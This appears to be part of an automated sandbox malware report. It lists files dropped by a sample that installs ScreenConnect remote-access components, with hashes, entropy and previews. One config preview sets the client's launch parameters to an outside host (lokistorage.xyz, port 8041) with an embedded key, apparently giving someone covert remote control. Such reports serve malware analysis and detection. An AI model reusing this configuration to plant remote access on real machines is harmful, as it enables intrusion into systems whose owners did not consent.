                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2268
                                                                Entropy (8bit):4.7228220006400745
                                                                Encrypted:false
                                                                SSDEEP:48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
                                                                MD5:095C85ACC658F0733BC6941163EC234C
                                                                SHA1:298C53608E02CAC620702CB6ABE75C70560C03B1
                                                                SHA-256:8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
                                                                SHA-512:FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):937
                                                                Entropy (8bit):5.785690574308825
                                                                Encrypted:false
                                                                SSDEEP:24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
                                                                MD5:5E233AF4F36C85FA9CA6A643F8CEA130
                                                                SHA1:9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
                                                                SHA-256:317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
                                                                SHA-512:4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Users\user\Desktop\lat0Kwfbuj.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):321
                                                                Entropy (8bit):5.36509199858051
                                                                Encrypted:false
                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                MD5:1CF2352B684EF57925D98E766BA897F2
                                                                SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):746
                                                                Entropy (8bit):5.349174276064173
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):1110630
                                                                Entropy (8bit):7.800118817272725
                                                                Encrypted:false
                                                                SSDEEP:24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
                                                                MD5:845B0569D54305E62C6E8FFE198D217C
                                                                SHA1:CD06C3D1554FE08099ADA4F4448A23A6422E6234
                                                                SHA-256:4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
                                                                SHA-512:AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):228
                                                                Entropy (8bit):5.069688959232011
                                                                Encrypted:false
                                                                SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):4.62694170304723
                                                                Encrypted:false
                                                                SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):36864
                                                                Entropy (8bit):4.340550904466943
                                                                Encrypted:false
                                                                SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):57344
                                                                Entropy (8bit):4.657268358041957
                                                                Encrypted:false
                                                                SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):5.775360792482692
                                                                Encrypted:false
                                                                SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.19884453207748
                                                                Encrypted:false
                                                                SSDEEP:384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
                                                                MD5:9260AFE4BBDE2549FC0B92F657C2E50A
                                                                SHA1:5580778A62B06D7B56D3F788727514551DE31647
                                                                SHA-256:588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
                                                                SHA-512:AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....*^.(......./...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5358
                                                                Entropy (8bit):5.152842845836485
                                                                Encrypted:false
                                                                SSDEEP:48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
                                                                MD5:8BD7F5FAA7C10C7BD3DADF217622D3C5
                                                                SHA1:DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
                                                                SHA-256:378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
                                                                SHA-512:0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1135
                                                                Entropy (8bit):5.055198370362517
                                                                Encrypted:false
                                                                SSDEEP:24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
                                                                MD5:7F75CED83D8C263A88A622A1E089B902
                                                                SHA1:4C14858C78B556A0D1A02D596F74059944AE7865
                                                                SHA-256:115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
                                                                SHA-512:C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) &gt; 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1768
                                                                Entropy (8bit):5.101132156143849
                                                                Encrypted:false
                                                                SSDEEP:48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
                                                                MD5:258C82001204536C091D6ABF60724339
                                                                SHA1:1C71A8427C60C962D655AD5199F1D68A049EE549
                                                                SHA-256:C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
                                                                SHA-512:3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):629
                                                                Entropy (8bit):5.130173870130788
                                                                Encrypted:false
                                                                SSDEEP:12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
                                                                MD5:31908D4B70E384C9F4D42CB05A28A73C
                                                                SHA1:7A69055E9EB8E482C009F12CF5E555585531663B
                                                                SHA-256:3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
                                                                SHA-512:ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5837
                                                                Entropy (8bit):5.223683802415461
                                                                Encrypted:false
                                                                SSDEEP:48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
                                                                MD5:144ADC93F53E457A1BFFA5372FD3C09B
                                                                SHA1:6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
                                                                SHA-256:D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
                                                                SHA-512:08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):741
                                                                Entropy (8bit):5.169072715134804
                                                                Encrypted:false
                                                                SSDEEP:12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
